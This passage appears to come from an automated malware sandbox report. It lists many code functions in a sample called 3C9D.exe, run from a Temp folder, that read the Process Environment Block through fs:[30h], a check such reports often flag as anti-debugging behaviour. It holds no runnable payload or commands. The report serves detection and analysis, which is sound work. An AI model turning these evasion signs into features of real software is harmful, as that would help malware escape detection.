                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20F0BF mov ecx, dword ptr fs:[00000030h]30_2_6B20F0BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20F0BF mov eax, dword ptr fs:[00000030h]30_2_6B20F0BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20F0BF mov eax, dword ptr fs:[00000030h]30_2_6B20F0BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE8B0 mov eax, dword ptr fs:[00000030h]30_2_6B1DE8B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov eax, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov eax, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov eax, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov ecx, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov eax, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28AE mov eax, dword ptr fs:[00000030h]30_2_6B1E28AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E38A4 mov eax, dword ptr fs:[00000030h]30_2_6B1E38A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E38A4 mov ecx, dword ptr fs:[00000030h]30_2_6B1E38A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28E0E9 mov eax, dword ptr fs:[00000030h]30_2_6B28E0E9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28E0E9 mov eax, dword ptr fs:[00000030h]30_2_6B28E0E9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D70C0 mov eax, dword ptr fs:[00000030h]30_2_6B1D70C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D70C0 mov eax, dword ptr fs:[00000030h]30_2_6B1D70C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28FD mov eax, dword ptr fs:[00000030h]30_2_6B1E28FD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28FD mov eax, dword ptr fs:[00000030h]30_2_6B1E28FD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E28FD mov eax, dword ptr fs:[00000030h]30_2_6B1E28FD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D58EC mov eax, dword ptr fs:[00000030h]30_2_6B1D58EC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB8E4 mov eax, dword ptr fs:[00000030h]30_2_6B1FB8E4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB8E4 mov eax, dword ptr fs:[00000030h]30_2_6B1FB8E4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D40E1 mov eax, dword ptr fs:[00000030h]30_2_6B1D40E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D40E1 mov eax, dword ptr fs:[00000030h]30_2_6B1D40E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D40E1 mov eax, dword ptr fs:[00000030h]30_2_6B1D40E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FF716 mov eax, dword ptr fs:[00000030h]30_2_6B1FF716
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20E730 mov eax, dword ptr fs:[00000030h]30_2_6B20E730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB73D mov eax, dword ptr fs:[00000030h]30_2_6B1FB73D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB73D mov eax, dword ptr fs:[00000030h]30_2_6B1FB73D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C707 mov eax, dword ptr fs:[00000030h]30_2_6B20C707
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C707 mov ecx, dword ptr fs:[00000030h]30_2_6B20C707
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C707 mov eax, dword ptr fs:[00000030h]30_2_6B20C707
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6730 mov eax, dword ptr fs:[00000030h]30_2_6B1D6730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6730 mov eax, dword ptr fs:[00000030h]30_2_6B1D6730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6730 mov eax, dword ptr fs:[00000030h]30_2_6B1D6730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204710 mov eax, dword ptr fs:[00000030h]30_2_6B204710
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4F2E mov eax, dword ptr fs:[00000030h]30_2_6B1D4F2E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4F2E mov eax, dword ptr fs:[00000030h]30_2_6B1D4F2E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28DF1D mov ecx, dword ptr fs:[00000030h]30_2_6B28DF1D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28DF1D mov eax, dword ptr fs:[00000030h]30_2_6B28DF1D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B26FF10 mov eax, dword ptr fs:[00000030h]30_2_6B26FF10
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B26FF10 mov eax, dword ptr fs:[00000030h]30_2_6B26FF10
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8F6A mov eax, dword ptr fs:[00000030h]30_2_6B2A8F6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CF6A mov eax, dword ptr fs:[00000030h]30_2_6B20CF6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CF6A mov eax, dword ptr fs:[00000030h]30_2_6B20CF6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F70 mov eax, dword ptr fs:[00000030h]30_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DA745 mov eax, dword ptr fs:[00000030h]30_2_6B1DA745
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DF4C mov eax, dword ptr fs:[00000030h]30_2_6B20DF4C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F mov eax, dword ptr fs:[00000030h]30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F mov eax, dword ptr fs:[00000030h]30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F mov eax, dword ptr fs:[00000030h]30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F mov eax, dword ptr fs:[00000030h]30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F mov eax, dword ptr fs:[00000030h]30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6F60 mov eax, dword ptr fs:[00000030h]30_2_6B1D6F60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6F60 mov eax, dword ptr fs:[00000030h]30_2_6B1D6F60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FE760 mov eax, dword ptr fs:[00000030h]30_2_6B1FE760
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FE760 mov eax, dword ptr fs:[00000030h]30_2_6B1FE760
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov ecx, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 mov eax, dword ptr fs:[00000030h]30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB mov eax, dword ptr fs:[00000030h]30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2137F5 mov eax, dword ptr fs:[00000030h]30_2_6B2137F5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3FC5 mov eax, dword ptr fs:[00000030h]30_2_6B1D3FC5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3FC5 mov eax, dword ptr fs:[00000030h]30_2_6B1D3FC5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3FC5 mov eax, dword ptr fs:[00000030h]30_2_6B1D3FC5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D7CA mov eax, dword ptr fs:[00000030h]30_2_6B20D7CA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D7CA mov eax, dword ptr fs:[00000030h]30_2_6B20D7CA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B210E21 mov eax, dword ptr fs:[00000030h]30_2_6B210E21
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B255623 mov eax, dword ptr fs:[00000030h]30_2_6B255623
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FE3F mov eax, dword ptr fs:[00000030h]30_2_6B28FE3F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DC600 mov eax, dword ptr fs:[00000030h]30_2_6B1DC600
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DC600 mov eax, dword ptr fs:[00000030h]30_2_6B1DC600
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DC600 mov eax, dword ptr fs:[00000030h]30_2_6B1DC600
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C63D mov eax, dword ptr fs:[00000030h]30_2_6B20C63D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DA63B mov eax, dword ptr fs:[00000030h]30_2_6B1DA63B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DA63B mov eax, dword ptr fs:[00000030h]30_2_6B1DA63B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B262E14 mov eax, dword ptr fs:[00000030h]30_2_6B262E14
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25AE60 mov eax, dword ptr fs:[00000030h]30_2_6B25AE60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25AE60 mov eax, dword ptr fs:[00000030h]30_2_6B25AE60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25AE60 mov eax, dword ptr fs:[00000030h]30_2_6B25AE60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25AE60 mov eax, dword ptr fs:[00000030h]30_2_6B25AE60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CE6C mov eax, dword ptr fs:[00000030h]30_2_6B20CE6C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CE6C mov ecx, dword ptr fs:[00000030h]30_2_6B20CE6C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203E70 mov eax, dword ptr fs:[00000030h]30_2_6B203E70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28F674 mov eax, dword ptr fs:[00000030h]30_2_6B28F674
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E766D mov eax, dword ptr fs:[00000030h]30_2_6B1E766D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266652 mov eax, dword ptr fs:[00000030h]30_2_6B266652
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2546A7 mov eax, dword ptr fs:[00000030h]30_2_6B2546A7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B262EA3 mov eax, dword ptr fs:[00000030h]30_2_6B262EA3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3E80 mov eax, dword ptr fs:[00000030h]30_2_6B1D3E80
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3E80 mov eax, dword ptr fs:[00000030h]30_2_6B1D3E80
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DE9E mov eax, dword ptr fs:[00000030h]30_2_6B20DE9E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DE9E mov eax, dword ptr fs:[00000030h]30_2_6B20DE9E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DE9E mov eax, dword ptr fs:[00000030h]30_2_6B20DE9E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2016E0 mov ecx, dword ptr fs:[00000030h]30_2_6B2016E0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B213EE4 mov eax, dword ptr fs:[00000030h]30_2_6B213EE4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B213EE4 mov eax, dword ptr fs:[00000030h]30_2_6B213EE4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B213EE4 mov eax, dword ptr fs:[00000030h]30_2_6B213EE4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2036CC mov eax, dword ptr fs:[00000030h]30_2_6B2036CC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8ED6 mov eax, dword ptr fs:[00000030h]30_2_6B2A8ED6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E76E2 mov eax, dword ptr fs:[00000030h]30_2_6B1E76E2
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF51D mov eax, dword ptr fs:[00000030h]30_2_6B1DF51D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 mov eax, dword ptr fs:[00000030h]30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 mov eax, dword ptr fs:[00000030h]30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 mov eax, dword ptr fs:[00000030h]30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 mov eax, dword ptr fs:[00000030h]30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 mov eax, dword ptr fs:[00000030h]30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204D3B mov eax, dword ptr fs:[00000030h]30_2_6B204D3B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204D3B mov eax, dword ptr fs:[00000030h]30_2_6B204D3B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204D3B mov eax, dword ptr fs:[00000030h]30_2_6B204D3B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8D34 mov eax, dword ptr fs:[00000030h]30_2_6B2A8D34
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DAD30 mov eax, dword ptr fs:[00000030h]30_2_6B1DAD30
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B293518 mov eax, dword ptr fs:[00000030h]30_2_6B293518
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B293518 mov eax, dword ptr fs:[00000030h]30_2_6B293518
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B293518 mov eax, dword ptr fs:[00000030h]30_2_6B293518
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F7D50 mov eax, dword ptr fs:[00000030h]30_2_6B1F7D50
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D354C mov eax, dword ptr fs:[00000030h]30_2_6B1D354C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D354C mov eax, dword ptr fs:[00000030h]30_2_6B1D354C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B213D43 mov eax, dword ptr fs:[00000030h]30_2_6B213D43
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B283D40 mov eax, dword ptr fs:[00000030h]30_2_6B283D40
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FC577 mov eax, dword ptr fs:[00000030h]30_2_6B1FC577
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FC577 mov eax, dword ptr fs:[00000030h]30_2_6B1FC577
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B288D47 mov eax, dword ptr fs:[00000030h]30_2_6B288D47
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2035A1 mov eax, dword ptr fs:[00000030h]30_2_6B2035A1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3591 mov eax, dword ptr fs:[00000030h]30_2_6B1D3591
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201DB5 mov eax, dword ptr fs:[00000030h]30_2_6B201DB5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201DB5 mov eax, dword ptr fs:[00000030h]30_2_6B201DB5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201DB5 mov eax, dword ptr fs:[00000030h]30_2_6B201DB5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29B581 mov eax, dword ptr fs:[00000030h]30_2_6B29B581
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29B581 mov eax, dword ptr fs:[00000030h]30_2_6B29B581
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29B581 mov eax, dword ptr fs:[00000030h]30_2_6B29B581
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29B581 mov eax, dword ptr fs:[00000030h]30_2_6B29B581
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2095EC mov eax, dword ptr fs:[00000030h]30_2_6B2095EC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B288DF1 mov eax, dword ptr fs:[00000030h]30_2_6B288DF1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D15C1 mov eax, dword ptr fs:[00000030h]30_2_6B1D15C1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D95F0 mov eax, dword ptr fs:[00000030h]30_2_6B1D95F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D95F0 mov ecx, dword ptr fs:[00000030h]30_2_6B1D95F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FDD3 mov eax, dword ptr fs:[00000030h]30_2_6B28FDD3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20BC2C mov eax, dword ptr fs:[00000030h]30_2_6B20BC2C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC01 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC01
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC01 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC01
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC01 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC01
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EFC01 mov eax, dword ptr fs:[00000030h]30_2_6B1EFC01
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4439 mov eax, dword ptr fs:[00000030h]30_2_6B1D4439
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A740D mov eax, dword ptr fs:[00000030h]30_2_6B2A740D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A740D mov eax, dword ptr fs:[00000030h]30_2_6B2A740D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A740D mov eax, dword ptr fs:[00000030h]30_2_6B2A740D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291C06 mov eax, dword ptr fs:[00000030h]30_2_6B291C06
